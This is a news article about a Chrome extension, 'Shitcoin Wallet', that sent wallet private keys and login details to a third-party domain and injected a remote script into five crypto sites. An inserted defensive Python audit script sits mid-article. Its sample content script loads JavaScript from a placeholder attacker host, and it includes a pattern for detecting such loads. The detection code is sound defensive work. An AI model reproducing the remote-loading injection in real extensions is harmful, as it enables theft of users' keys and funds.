Chrome Extension Discovered To Steal Crypto-Wallets’ Private Keys


Recently, a Google Chrome extension was caught injecting malicious JavaScript into web pages. The injected code lets the extension steal passwords and private keys from users’ crypto wallets and cryptocurrency portals.

Badly Named with Bad Intents

The extension is rather tastelessly named Shitcoin Wallet and carries the extension ID ckkgmccefffnbbalkmbbgebbojjogffn. It launched last month, which is to say last year, on 9 December 2019.

In the introductory blog post for the extension, the group behind it describes Shitcoin Wallet as a wallet for properly managing Ethereum coins. It also supports ERC20-based tokens, the kind usually doled out through Initial Coin Offerings (ICOs).

Very Convenient, But Tarnished

Had it been benign, this Chrome extension would have served a useful purpose. Users could install it and manage both ETH and ERC-20 tokens from within their web browser. They could also install a desktop app for Windows to manage their funds outside the higher-risk environment of a browser.

Things fell apart when Harry Denley, Director of Security at the MyCrypto platform, discovered malicious code inside the extension. It seems nothing can just be for the good of all humanity.

Denley explained that the extension was dangerous in two significant ways. First, any funds managed directly within the extension were at risk, because the extension sends the private keys of any and all wallets created or managed in its interface to a third-party website at erc20wallet[.]tk.

Second, the extension actively injects JavaScript whenever the user navigates to one of five popular, well-known cryptocurrency management platforms. The injected code steals the private keys and login details entered on those platforms as well, sending them to the same third-party website.

Step By Step

A detailed analysis of the code shows the process step by step. First, the user installs the extension, which requests permission to inject JavaScript on 77 websites. When one of these 77 websites is accessed, the extension loads and injects a further JavaScript file from https://erc20wallet[.]tk/js/content_.js. This file contains obfuscated code that activates on five sites: MyEtherWallet.com, Idex.Market, Binance.org, NeoTracker.io, and Switcheo.exchange. The code logs the private keys and login information the user enters there and sends them to the third-party website.
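As an added defensive example (not code from the article or from the extension itself), the Python below audits an extension's manifest.json and content script for the two indicators described above: a content script registered for an unusually large number of sites, and a content script that loads further JavaScript from a remote host. The manifest, the content script and the `remote-host.example` domain are constructed placeholders.

```python
import json
import re
from urllib.parse import urlparse

# Constructed sample manifest modelled on the behaviour the article describes
# (not the real extension's manifest): one content script registered for 77 sites.
SAMPLE_MANIFEST = json.dumps({
    "name": "Example Wallet", "version": "1.0",
    "content_scripts": [{
        "matches": [f"https://site{i}.example/*" for i in range(77)],
        "js": ["content.js"],
    }],
})

# Constructed content script that pulls a second script from a remote host
# (placeholder domain standing in for the attacker-controlled server).
SAMPLE_CONTENT_SCRIPT = """
var s = document.createElement('script');
s.src = 'https://remote-host.example/js/content_.js';
document.head.appendChild(s);
"""

# A benign counterpart: one site, no remote code.
CLEAN_MANIFEST = json.dumps({"content_scripts": [
    {"matches": ["https://wallet.example/*"], "js": ["content.js"]}]})
CLEAN_CONTENT_SCRIPT = "document.title = 'wallet ready';"

# Any http(s) URL ending in .js that appears as a string literal in the script.
REMOTE_JS = re.compile(r"""['"](https?://[^'"\s]+\.js)['"]""")

def content_script_matches(manifest_text):
    """Collect every match pattern the manifest's content scripts are registered for."""
    manifest = json.loads(manifest_text)
    patterns = set()
    for entry in manifest.get("content_scripts", []):
        patterns.update(entry.get("matches", []))
    return patterns

def remote_script_urls(script_text):
    """List the distinct remote .js URLs a content script references."""
    return sorted({m.group(1) for m in REMOTE_JS.finditer(script_text)})

def audit(manifest_text, script_text, max_sites=10):
    """Return human-readable findings; an empty list means nothing suspicious."""
    findings = []
    patterns = content_script_matches(manifest_text)
    if "<all_urls>" in patterns or any(p.startswith("*://*/") for p in patterns):
        findings.append("content script is injected into every site")
    elif len(patterns) > max_sites:
        findings.append(f"content script is injected into {len(patterns)} sites")
    for url in remote_script_urls(script_text):
        findings.append(f"content script loads remote code from {urlparse(url).hostname}")
    return findings
```

Run `audit()` against the files of an unpacked extension directory; a finding about remote code is worth a closer look even when the site count is small.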


About Ali Raza

A journalist with experience in web journalism and marketing. Ali holds a master’s degree in finance and enjoys writing about cryptocurrencies and fintech. Ali’s work has been published in a number of cryptocurrency publications.
